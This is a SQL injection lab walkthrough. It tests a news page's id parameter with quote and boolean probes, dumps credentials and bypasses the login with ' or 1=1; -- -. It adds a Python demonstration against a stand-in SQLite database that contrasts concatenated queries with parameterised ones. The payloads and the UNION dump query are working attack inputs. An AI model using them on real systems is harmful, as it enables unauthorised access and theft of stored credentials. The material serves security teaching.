Lab12 - SQL - Injection
The goal of this lab is to test the web application in order to find all the vulnerable injection
points. Once you find them, you should be able to dump all the data and successfully log
into the web application.
• Web browser
• sqlmap
By now you should have found a few injection points. Test each of them with different techniques.
Now that you know there is at least one exploitable SQL injection in the target web
application, exploit it and dump all the data from the database. You should be able to
retrieve some very interesting information that will allow you to log into the web app.
Test the login form for SQL injection and use the correct payload to bypass the
authentication mechanism.
Now that we are able to access it, let us navigate the application in order to find all the
possible injection points.
Right now we do not know any working credentials, so if we try to log in we get a message
similar to the following:
Here we have a list of news items, and by clicking on any of the links listed we reach a very
interesting page:
As you can see in the address bar of the browser, the application accepts a parameter (id).
This is probably used to retrieve the news item from a database.
We simply appended a single quote to the id value in the address bar, and as shown in the
screenshot above we obtained a MySQL error: the quote reached the database unescaped and broke
the query. It is time to get our hands dirty! Let us craft a few payloads to test whether the
parameter is vulnerable to SQL injection.
We want to test it against Boolean conditions, so let us use the following payload:
As we can see from the previous two screenshots, we obtain two different results. When
the injected condition is true, the application returns the news item. With a false condition
the page returns no content. The database is evaluating our condition, so the parameter is
vulnerable to (boolean-based) SQL injection!
As we can see, we now have a list of usernames and passwords to use in order to log into the
web application! Let us try one of them:
Let us run some tests and see if we are able to bypass the login! To do this we will use the
following payload:
' or 1=1; -- -
As we can see, the form is vulnerable too: the “Welcome!” message appears! The single quote
closes the username string literal, or 1=1 makes the WHERE clause true for every row, and
-- - comments out the rest of the query, including the password check (the trailing dash is
there because MySQL requires a space after the -- comment marker).
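The following is an added example, not code from the lab or from the target application. It reproduces the four steps above (single-quote error probe, boolean condition test, data extraction, login bypass) against a constructed in-memory SQLite database that stands in for the lab's MySQL back end. The table and column names, the sample rows, and the use of a UNION query for the dump step are all assumptions made for the example; the lab does not reveal its schema or the technique used to obtain the credential list. Each probe is run once against the string-concatenation version of the query and once against a parameterised version, so the difference between the two is visible.

```python
import sqlite3

# Constructed stand-in for the lab's database (assumption: schema and rows are
# illustrative; the lab does not reveal them).
SCHEMA = """
CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO news  VALUES (1, 'First post', 'Hello'), (2, 'Second post', 'World');
INSERT INTO users VALUES (1, 'admin', 'S3cret!'), (2, 'bob', 'hunter2');
"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- The application as the lab finds it: input concatenated into SQL -----

def news_vulnerable(conn, id_param):
    """news page ?id=<id_param>: the value lands unquoted inside the query."""
    sql = "SELECT id, title FROM news WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def login_vulnerable(conn, username, password):
    """Login form: both fields are spliced into quoted string literals."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


# --- The same two queries written with bound parameters --------------------

def news_safe(conn, id_param):
    return conn.execute("SELECT id, title FROM news WHERE id = ?",
                        (id_param,)).fetchall()


def login_safe(conn, username, password):
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


# --- Probes in the order the lab applies them ------------------------------

def error_probe(conn, fetch):
    """Step 1: append a single quote. A raw database error means the input
    reached the SQL parser unescaped (the MySQL error seen in the lab)."""
    try:
        fetch(conn, "1'")
    except sqlite3.Error:
        return True
    return False


def boolean_probe(conn, fetch):
    """Step 2: a true and a false condition on an otherwise valid id. The
    parameter is injectable if the true case returns the item and the false
    case returns nothing, which is what the lab's two screenshots compare."""
    true_case = fetch(conn, "1 AND 1=1")
    false_case = fetch(conn, "1 AND 1=2")
    return bool(true_case) and not false_case


def dump_users(conn, fetch):
    """Step 3 (assumption: UNION-based extraction). An id that matches nothing
    empties the original result so only the appended rows come back."""
    rows = fetch(conn, "-1 UNION SELECT username, password FROM users")
    return [(user, pwd) for user, pwd in rows]


def bypass_login(conn, login):
    """Step 4: the lab's payload in the username field; the comment marker
    swallows the password check, so the password can be anything."""
    return login(conn, "' or 1=1; -- -", "whatever")


if __name__ == "__main__":
    db = build_db()
    for label, fetch, login in (("concatenated", news_vulnerable, login_vulnerable),
                                ("parameterised", news_safe, login_safe)):
        print(label,
              "| error:", error_probe(db, fetch),
              "| boolean:", boolean_probe(db, fetch),
              "| dump:", dump_users(db, fetch),
              "| bypass:", bypass_login(db, login))
```

Against the concatenated queries every probe succeeds; against the parameterised ones the single quote is just a character that matches no row, the boolean payload is compared as a literal string and returns nothing, and the bypass payload never reaches the parser as SQL. The same four probes are what you are doing by hand in the browser, and what sqlmap automates when you point it at the id parameter.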